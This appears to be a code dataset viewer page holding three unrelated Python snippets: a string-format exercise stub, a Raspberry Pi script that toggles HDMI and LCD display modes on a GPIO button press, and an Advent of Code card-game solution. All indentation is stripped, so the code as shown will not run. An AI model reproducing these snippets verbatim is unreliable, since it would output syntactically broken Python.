ages = [('Joe', 9), ('Samantha', 45), ('Methuselah', 969)]
# for (name, age) in ages:
# print('XXXX'.format(XXXX))
|
#!/usr/bin/python2.7
import RPi.GPIO as GPIO
import subprocess as SP
screenState = "/home/pi/pi-tablet_retropie/assets/currentDisplayMode"
GPIO.setmode(GPIO.BCM)
GPIO.setup(23, GPIO.IN, pull_up_down=GPIO.PUD_UP)
try:
GPIO.wait_for_edge(23, GPIO.FALLING)
stateFile = open(screenState, 'r')
state = stateFile.readline()
state = str(state)
a,b = state.split("\n")
state = a
stateFile.close()
if (state == "hdmi"):
SP.call('echo "lcd" > /home/pi/pi-tablet_retropie/assets/currentDisplayMode', shell=True)
SP.call(['sudo','/home/pi/pi-tablet_retropie/assets/lcd_out'])
print("LCD-MODE")
elif (state == "lcd"):
SP.call('echo "hdmi" > /home/pi/pi-tablet_retropie/assets/currentDisplayMode', shell=True)
SP.call(['sudo','/home/pi/pi-tablet_retropie/assets/hdmi_out'])
print("HDMI-MODE")
except KeyboardInterrupt:
GPIO.cleanup() # clean up GPIO on CTRL+C exit
GPIO.cleanup() # clean up GPIO on normal exit
|
# pylint: disable=unused-wildcard-import
from utils import *
p1, p2 = inp_groups()
p1 = ints(p1[1:])
p2 = ints(p2[1:])
while p1 and p2:
c1, c2 = p1.pop(0), p2.pop(0)
if c1 > c2:
w = p1
else:
w = p2
w.append(max(c1, c2))
w.append(min(c1, c2))
print(w)
def score(w):
w = w[::-1]
t = 0
for i, v in enumerate(w):
t += (i+1)*v
return t
print("Part 1: ", score(w))
p1, p2 = inp_groups()
p1 = ints(p1[1:])
p2 = ints(p2[1:])
def play(p1, p2):
p1, p2 = list(p1), list(p2)
states = set()
while p1 and p2:
st = (tuple(p1), tuple(p2))
if st in states:
return 1, p1
else:
states.add(st)
if (len(states) % 1000 == 0):
print(len(states), len(p1)+len(p2))
c1 = p1.pop(0)
c2 = p2.pop(0)
if c1 <= len(p1) and c2 <= len(p2):
(w, _) = play(p1[:c1], p2[:c2])
else:
w = 1 if c1 > c2 else 2
w, wc, lc = [0, (p1, c1, c2), (p2, c2, c1)][w]
w.append(wc)
w.append(lc)
if p1:
return (1, p1)
else:
return (2, p2)
(_, w) = play(tuple(p1), tuple(p2))
print("Part 2: ", score(w))
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.